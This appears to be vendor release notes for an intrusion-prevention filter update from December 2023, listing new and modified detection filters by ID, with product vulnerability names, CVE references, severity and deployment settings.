New Filters:
43397: HTTP: Apache Superset Database API Request
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Security Policy
- Severity: Low
- Description: This filter detects database API requests in Apache Superset.
- Deployment: Not enabled by default in any deployment.
- References:
- Common Vulnerabilities and Exposures: CVE-2023-27524
- Classification: Security Policy - Forbidden Application Access or Service Request
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43508: HTTP: Suspicious Internet Shortcut File Download
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Security Policy
- Severity: Moderate
- Description: This filter detects the download of a suspicious Internet Shortcut file.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-36025
- Classification: Security Policy - Other
- Protocol: HTTP
- Platform: Windows Client Application
- Release Date: December 05, 2023
43511: HTTP: Citrix ADC Gateway Cross-Site Scripting Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: High
- Description: This filter detects an attempt to exploit a cross-site scripting vulnerability in Citrix NetScaler and Application Delivery Controller.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-24488
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43513: HTTP: Goteleport Teleport Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter detects an attempt to exploit a command injection vulnerability in Goteleport Teleport.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2022-36633
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Client Application
- Release Date: December 05, 2023
43515: HTTP: Sophos Web Appliance sblistpack Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects an attempt to exploit a command injection vulnerability in Sophos Web Appliance.
- Deployment: Not enabled by default in any deployment.
- References:
- Common Vulnerabilities and Exposures: CVE-2023-1671
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43516: HTTP: cURL and libcurl HTTP Response Headers Parsing Resource Exhaustion Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects attempts to exploit a resource exhaustion vulnerability in cURL/libcurl.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-38039
- Classification: Vulnerability - Denial of Service (Crash/Reboot)
- Protocol: HTTP
- Platform: Multi-Platform Client Application
- Release Date: December 05, 2023
43518: SMB: Linux Kernel ksmbd SMB2_LOGOFF Handling NULL Pointer Dereference Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Exploits
- Severity: Critical
- Description: This filter detects an attempt to exploit a NULL Pointer Dereference vulnerability in the Linux kernel KSMBD.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-32252
- Classification: Vulnerability - Denial of Service (Crash/Reboot)
- Protocol: SMB
- Platform: Windows Server Application or Service
- Release Date: December 05, 2023
43519: ZDI-CAN-22440: Zero Day Initiative Vulnerability (Western Digital MyCloud PR4100)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: Not available.
- Requires: IPS N-Platform, NX-Platform, or TPS models.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter protects against the exploitation of a zero-day vulnerability affecting Western Digital MyCloud PR4100.
- Deployments:
- Deployment: Security-Optimized (Block / Notify / Trace)
- Classification: Vulnerability - Other
- Protocol: Other Protocol
- Platform: Other Server Application or Service
- Release Date: December 05, 2023
43525: HTTP: XWiki.org AdminSheet Template Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: Critical
- Description: This filter detects an attempt to exploit a template injection vulnerability in XWiki.org XWiki.
- Deployments:
- Deployment: Security-Optimized (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-46731
- Classification: Vulnerability - Input Validation (Command injection, XSS, SQL injection, etc)
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
43527: HTTP: ownCloud graphapi GetPhpInfo.php Information Disclosure Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Category: Vulnerabilities
- Severity: High
- Description: This filter detects an attempt to exploit an information disclosure vulnerability in ownCloud graphapi.
- Deployments:
- Deployment: Default (Block / Notify)
- References:
- Common Vulnerabilities and Exposures: CVE-2023-49103
- Classification: Vulnerability - Access Validation
- Protocol: HTTP
- Platform: Multi-Platform Server Application or Service
- Release Date: December 05, 2023
Modified Filters (logic changes):
* = Enabled in Default deployments
* 40627: HTTP: JNDI Injection in HTTP Request
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Detection logic updated.
- Release Date: December 13, 2021
- Last Modified Date: December 05, 2023
42479: HTTP: LG Simple Editor copyTemplateAll Directory Traversal Vulnerability (ZDI-23-1201)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: March 14, 2023
- Last Modified Date: December 05, 2023
43051: HTTP: Adobe RoboHelp Server OnPublishFile Directory Traversal Vulnerability (ZDI-23-1652)
- IPS Version: 3.0.0 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43051: ZDI-CAN-21307: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
43068: HTTP: Adobe RoboHelp Server GetNewUserId SQL Injection Vulnerability (ZDI-23-1649)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43068: ZDI-CAN-21306: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Severity changed from "Critical" to "High".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
* 43257: HTTP: Microsoft Exchange IsUNCPath Improper Input Validation NTLM Relay Vulnerability (ZDI-23-1637)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43257: ZDI-CAN-21983: Zero Day Initiative Vulnerability (Microsoft Exchange)".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: September 19, 2023
- Last Modified Date: December 05, 2023
43468: HTTP: Roundcube Webmail rcube_washtml.php Stored Cross-Site Scripting Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43468: HTTP: Suspicious SVG HTML Tag Detected".
- Category changed from "Security Policy" to "Vulnerabilities".
- Description updated.
- Detection logic updated.
- Vulnerability references updated.
- Release Date: November 14, 2023
- Last Modified Date: December 05, 2023
Modified Filters (metadata changes only):
* = Enabled in Default deployments
42235: HTTP: D-Link DIR-2640 DestNetwork Command Injection Vulnerability (ZDI-23-542, ZDI-23-543)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Description updated.
- Release Date: January 31, 2023
- Last Modified Date: December 05, 2023
42753: HTTP: Siemens Tecnomatix Plant Simulation WRL Use-After-Free Vulnerability (ZDI-23-1626)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42753: ZDI-CAN-20842: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42756: HTTP: Siemens Tecnomatix Plant Simulation WRL Out-Of-Bounds Write Vulnerability (ZDI-23-1630)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42756: ZDI-CAN-20825: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42757: HTTP: Siemens Tecnomatix Plant Simulation WRL Stack-based Buffer Overflow Vulnerability(ZDI-23-1632)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42757: ZDI-CAN-20818: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42758: HTTP: Siemens Tecnomatix Plant Simulation WRL Heap-based Buffer Overflow Vulnerability (ZDI-23-1631)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42758: ZDI-CAN-20824: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42759: HTTP: Siemens Tecnomatix Plant Simulation WRL Type Confusion Vulnerability (ZDI-23-1628)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42759: ZDI-CAN-20840: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42760: HTTP: Siemens Tecnomatix Plant Simulation WRL File Parsing Type Confusion Vulnerability(ZDI-23-1629)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "42760: ZDI-CAN-20826: Zero Day Initiative Vulnerability (Siemens Tecnomaticix Plant Simulation)".
- Description updated.
- Vulnerability references updated.
- Release Date: May 30, 2023
- Last Modified Date: December 05, 2023
42903: HTTP: PaperCut NG External User Lookup Code Injection Vulnerability (ZDI-23-1285)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Miscellaneous modification.
- Release Date: July 04, 2023
- Last Modified Date: December 05, 2023
43006: HTTP: NETGEAR CAX30 SSO Stack-based Buffer Overflow Vulnerability (ZDI-23-1636)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43006: ZDI-CAN-19058: Zero Day Initiative Vulnerability (NETGEAR CAX30)".
- Description updated.
- Vulnerability references updated.
- Release Date: July 25, 2023
- Last Modified Date: December 05, 2023
43049: HTTP: Adobe RoboHelp Server resolveDistinguishedName LDAP Injection Vulnerability (ZDI-23-1650)
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Name changed from "43049: ZDI-CAN-21309: Zero Day Initiative Vulnerability (Adobe RoboHelp Server)".
- Severity changed from "Critical" to "High".
- Description updated.
- Vulnerability references updated.
- Release Date: August 01, 2023
- Last Modified Date: December 05, 2023
43098: HTTP: SonicWall GMS and Analytics searchFilter Command Injection Vulnerability
- IPS Version: 3.9.5 and after.
- TPS Version: 5.2.2 and after.
- vTPS Version: 5.2.2 and after.
- Miscellaneous modification.
- Release Date: August 15, 2023
- Last Modified Date: December 05, 2023
Removed Filters: None
|
Welcome to the future of Business Support! I'm Trend Companion, your
AI assistant ready to streamline your experience.
Log in for your personalized support!
Chat with Trend Companion for quick answers, or submit a case for
detailed troubleshooting.